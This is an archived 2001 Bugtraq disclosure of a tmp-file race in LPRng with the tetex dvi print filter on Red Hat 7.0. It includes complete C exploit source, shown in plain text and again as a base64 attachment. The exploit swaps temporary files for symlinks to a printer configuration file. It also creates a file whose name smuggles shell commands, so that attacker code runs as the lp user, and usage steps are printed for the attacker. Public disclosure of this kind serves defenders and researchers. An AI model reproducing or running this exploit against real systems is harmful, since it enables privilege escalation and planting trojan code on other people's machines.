BSD, Linux, Cisco, Web, Palm, other unix RUSSIAN version Search:  Хинт: Ищите информацию по программированию под Unix ? Рекомендую посмотреть раздел Программирование каталога ссылок. SOFT - Unix Software catalog LINKS - Unix resources TOPIC - Articles from usenet DOCUMENTATION - Unix guides News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Date: Fri, 22 Jun 2001 00:10:13 +1200 (NZST)
From: zen-parse@gmx.net
To: bugtraq@securityfocus.com
Subject: LPRng + tetex tmpfile race - uid lp exploit

---1463783680-1713886182-993125413=:7318
Content-Type: TEXT/PLAIN; charset=US-ASCII

If the tetex package and LPRng are installed, there is an exploitable
race condition with a tmp file that allows elevation of privs.

It's fixed in rawhide, but that doesn't really help people who
just use the provided up2date program to keep themselves secure.

/********************************************************************
Redhat 7.0

LPRng-3.7.4-23  (and earlier)  +  tetex-1.0.7-7   (and earlier?)

     Insecure tmp file privilege elevation vulnerability.

Allows uid/gid lp  and  root groups on LPRng-3.6.24 and earlier
Please note:

-rwxr-xr-x    1 lp       lp         444472 Jun 14 22:05 /usr/bin/lpq*
-rwxr-xr-x    1 lp       lp         441624 Jun 14 22:05 /usr/bin/lprm*
-rwxr-xr-x    1 lp       lp         459160 Jun 14 22:05 /usr/bin/lpr*
-rwxr-xr-x    1 lp       lp         448120 Jun 14 22:05 /usr/bin/lpstat*
-rwxr-xr-x    1 lp       lp         448320 Jun 14 22:05 /usr/sbin/lpc*

 this program allows trojan code to be planted on the machine it is
 executed on.

 tmp file handling done badly in helper application (dvi print filter)
 allows modification to lp config files.
 the configuation file is sourced by the master print filter,
 which is itself a shell script, each time something is printed.
 this makes it possible to insert commands into the configuration file
 by creating a special filename to be included in the file that
 is created. (see the close(open(" thingee )

Redhat Bugzilla reference:-

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=43342

 --zen-parse

important info about this exploit:

 requires some fonts get made when its run.
 probably won't be a problem unless someone
 else has tried this exploit.
 just wait 90 days for /var/lib/texmf to clear
 and try again ;]
 or try print something different
 .dvi files are what does the trick.

********************************************************************/

int shake()
{
 int f;
 char r[1000];
 int w;
 f=fopen("/proc/loadavg","r");
 fscanf(f,"%*s %*s %*s %*s %s",r);
 fclose(f);
 w=atoi(r);
 return w;
}
void cow(char *s,char *t,int ofs)
{
 sprintf(s,"/var/lib/texmf/lsR%d.tmp",ofs);
 sprintf(t,"%s/lsR%d.tmp",s,ofs);
}

main()
{
 char s[1000];
 char t[1000];
 int y,i;
 printf("Put the stuff to run as lp:lp in /tmp/hax\n");
 printf("the lpr /usr/share/aspe<tab>/manual.dvi\n");
 printf("when the ! comes up, wait a second, then press control-C.\n\n");
 printf("Then print something.\n\n\n");
 close(open("/var/lib/texmf/cd ..\ncd ..\ncd ..\ncd ..\ncd ..\ncd ..\ncd tmp\nexport PATH=.\nhax\nexit 0",65,0666));
 while(1)
 {
  i=shake();
  for(y=-30;y<0;y++)
  {
   cow(s,t,y+i);
   if(!access(t,0))
   {
    printf("!\n");
    unlink(t);
    symlink("/var/spool/lpd/lp/postscript.cfg",t);
    sleep(1);
   }
  }
 }
}

---1463783680-1713886182-993125413=:7318
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="LPRace.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.33.0106220010130.7318@clarity.local>
Content-Description: 
Content-Disposition: attachment; filename="LPRace.c"

LyoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqDQpSZWRoYXQgNy4wIChtZWJlIDcu
MSA/KQ0KDQpMUFJuZy0zLjcuNC0yMyAgKGFuZCBlYXJsaWVyKSAgKyAgdGV0
ZXgtMS4wLjctNyAgIChhbmQgZWFybGllcj8pDQoNCiAgICAgSW5zZWN1cmUg
dG1wIGZpbGUgcHJpdmlsZWdlIGVsZXZhdGlvbiB2dWxuZXJhYmlsaXR5Lg0K
DQpBbGxvd3MgdWlkL2dpZCBscCAgYW5kICByb290IGdyb3VwcyBvbiBMUFJu
Zy0zLjYuMjQgYW5kIGVhcmxpZXINClBsZWFzZSBub3RlOg0KDQotcnd4ci14
ci14ICAgIDEgbHAgICAgICAgbHAgICAgICAgICA0NDQ0NzIgSnVuIDE0IDIy
OjA1IC91c3IvYmluL2xwcSoNCi1yd3hyLXhyLXggICAgMSBscCAgICAgICBs
cCAgICAgICAgIDQ0MTYyNCBKdW4gMTQgMjI6MDUgL3Vzci9iaW4vbHBybSoN
Ci1yd3hyLXhyLXggICAgMSBscCAgICAgICBscCAgICAgICAgIDQ1OTE2MCBK
dW4gMTQgMjI6MDUgL3Vzci9iaW4vbHByKg0KLXJ3eHIteHIteCAgICAxIGxw
ICAgICAgIGxwICAgICAgICAgNDQ4MTIwIEp1biAxNCAyMjowNSAvdXNyL2Jp
bi9scHN0YXQqDQotcnd4ci14ci14ICAgIDEgbHAgICAgICAgbHAgICAgICAg
ICA0NDgzMjAgSnVuIDE0IDIyOjA1IC91c3Ivc2Jpbi9scGMqDQoNCiB0aGlz
IHByb2dyYW0gYWxsb3dzIHRyb2phbiBjb2RlIHRvIGJlIHBsYW50ZWQgb24g
dGhlIG1hY2hpbmUgaXQgaXMNCiBleGVjdXRlZCBvbi4gDQoNCiB0bXAgZmls
ZSBoYW5kbGluZyBkb25lIGJhZGx5IGluIGhlbHBlciBhcHBsaWNhdGlvbiAo
ZHZpIHByaW50IGZpbHRlcikNCiBhbGxvd3MgbW9kaWZpY2F0aW9uIHRvIGxw
IGNvbmZpZyBmaWxlcy4NCiB0aGUgY29uZmlndWF0aW9uIGZpbGUgaXMgc291
cmNlZCBieSB0aGUgbWFzdGVyIHByaW50IGZpbHRlciwNCiB3aGljaCBpcyBp
dHNlbGYgYSBzaGVsbCBzY3JpcHQsIGVhY2ggdGltZSBzb21ldGhpbmcgaXMg
cHJpbnRlZC4NCiB0aGlzIG1ha2VzIGl0IHBvc3NpYmxlIHRvIGluc2VydCBj
b21tYW5kcyBpbnRvIHRoZSBjb25maWd1cmF0aW9uIGZpbGUNCiBieSBjcmVh
dGluZyBhIHNwZWNpYWwgZmlsZW5hbWUgdG8gYmUgaW5jbHVkZWQgaW4gdGhl
IGZpbGUgdGhhdCANCiBpcyBjcmVhdGVkLiAoc2VlIHRoZSBjbG9zZShvcGVu
KCIgdGhpbmdlZSApDQoNCg0KUmVkaGF0IEJ1Z3ppbGxhIHJlZmVyZW5jZTot
DQoNCmh0dHBzOi8vYnVnemlsbGEucmVkaGF0LmNvbS9idWd6aWxsYS9zaG93
X2J1Zy5jZ2k/aWQ9NDMzNDINCg0KIC0temVuLXBhcnNlIA0KDQogcmVxdWly
ZXMgc29tZSBmb250cyBnZXQgbWFkZSB3aGVuIGl0cyBydW4uDQogcHJvYmFi
bHkgd29uJ3QgYmUgYSBwcm9ibGVtIHVubGVzcyBzb21lb25lDQogZWxzZSBo
YXMgdHJpZWQgdGhpcyBleHBsb2l0Lg0KIGp1c3Qgd2FpdCA5MCBkYXlzIGZv
ciAvdmFyL2xpYi90ZXhtZiB0byBjbGVhcg0KIGFuZCB0cnkgYWdhaW4gO10N
CiBvciB0cnkgcHJpbnQgc29tZXRoaW5nIGRpZmZlcmVudA0KIC5kdmkgZmls
ZXMgYXJlIHdoYXQgZG9lcyB0aGUgdHJpY2suDQoNCioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqLw0KDQppbnQgc2hha2UoKQ0Kew0KIGludCBmOw0KIGNoYXIg
clsxMDAwXTsNCiBpbnQgdzsNCiBmPWZvcGVuKCIvcHJvYy9sb2FkYXZnIiwi
ciIpOw0KIGZzY2FuZihmLCIlKnMgJSpzICUqcyAlKnMgJXMiLHIpOw0KIGZj
bG9zZShmKTsNCiB3PWF0b2kocik7DQogcmV0dXJuIHc7DQp9DQp2b2lkIGNv
dyhjaGFyICpzLGNoYXIgKnQsaW50IG9mcykNCnsNCiBzcHJpbnRmKHMsIi92
YXIvbGliL3RleG1mL2xzUiVkLnRtcCIsb2ZzKTsNCiBzcHJpbnRmKHQsIiVz
L2xzUiVkLnRtcCIscyxvZnMpOw0KfQ0KDQptYWluKCkNCnsNCiBjaGFyIHNb
MTAwMF07DQogY2hhciB0WzEwMDBdOw0KIGludCB5LGk7DQogcHJpbnRmKCJQ
dXQgdGhlIHN0dWZmIHRvIHJ1biBhcyBscDpscCBpbiAvdG1wL2hheFxuIik7
DQogcHJpbnRmKCJ0aGUgbHByIC91c3Ivc2hhcmUvYXNwZTx0YWI+L21hbnVh
bC5kdmlcbiIpOw0KIHByaW50Zigid2hlbiB0aGUgISBjb21lcyB1cCwgd2Fp
dCBhIHNlY29uZCwgdGhlbiBwcmVzcyBjb250cm9sLUMuXG5cbiIpOw0KIHBy
aW50ZigiVGhlbiBwcmludCBzb21ldGhpbmcuXG5cblxuIik7DQogY2xvc2Uo
b3BlbigiL3Zhci9saWIvdGV4bWYvY2QgLi5cbmNkIC4uXG5jZCAuLlxuY2Qg
Li5cbmNkIC4uXG5jZCAuLlxuY2QgdG1wXG5leHBvcnQgUEFUSD0uXG5oYXhc
bmV4aXQgMCIsNjUsMDY2NikpOw0KIHdoaWxlKDEpDQogew0KICBpPXNoYWtl
KCk7DQogIGZvcih5PS0zMDt5PDA7eSsrKQ0KICB7DQogICBjb3cocyx0LHkr
aSk7DQogICBpZighYWNjZXNzKHQsMCkpDQogICB7IA0KICAgIHByaW50Zigi
IVxuIik7DQogICAgdW5saW5rKHQpOw0KICAgIHN5bWxpbmsoIi92YXIvc3Bv
b2wvbHBkL2xwL3Bvc3RzY3JpcHQuY2ZnIix0KTsNCiAgICBzbGVlcCgxKTsN
CiAgIH0NCiAgfQ0KIH0NCn0NCg==
---1463783680-1713886182-993125413=:7318--

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Быстрая навигация по сайту __________________ КАТАЛОГИ: Каталог программного обеспечения Каталог ссылок на unix ресурсы Каталог тематических статей Архив документации Советы, заметки MAN - Системные руководства __________________ НОВОСТИ: Новости OpenNews LastSoft - Свежий софт Обзоры ПО с freshmeat Проблемы безопасности Новости с других сайтов __________________ ОБЩЕНИЕ: Форум/Конферения _______________ МИНИ-ПОРТАЛЫ: CISCO.opennet.ru BSD.opennet.ru LINUX.opennet.ru SOLARIS.opennet.ru WEB.opennet.ru - web-технологии SECURITY.opennet.ru PALM.opennet.ru - карманные ПК __________________ НАВИГАЦИЯ: Навигация по ключевым словам Системы ПОИСКА __________________ РАЗНОЕ: ЦУП - Центр Управления Проектом Добавление в каталоги Закладки Добавить в закладки Created 1996-2003 by Maxim Chirkov   Добавить, Реклама, Вебмастеру, ЦУП, ГИД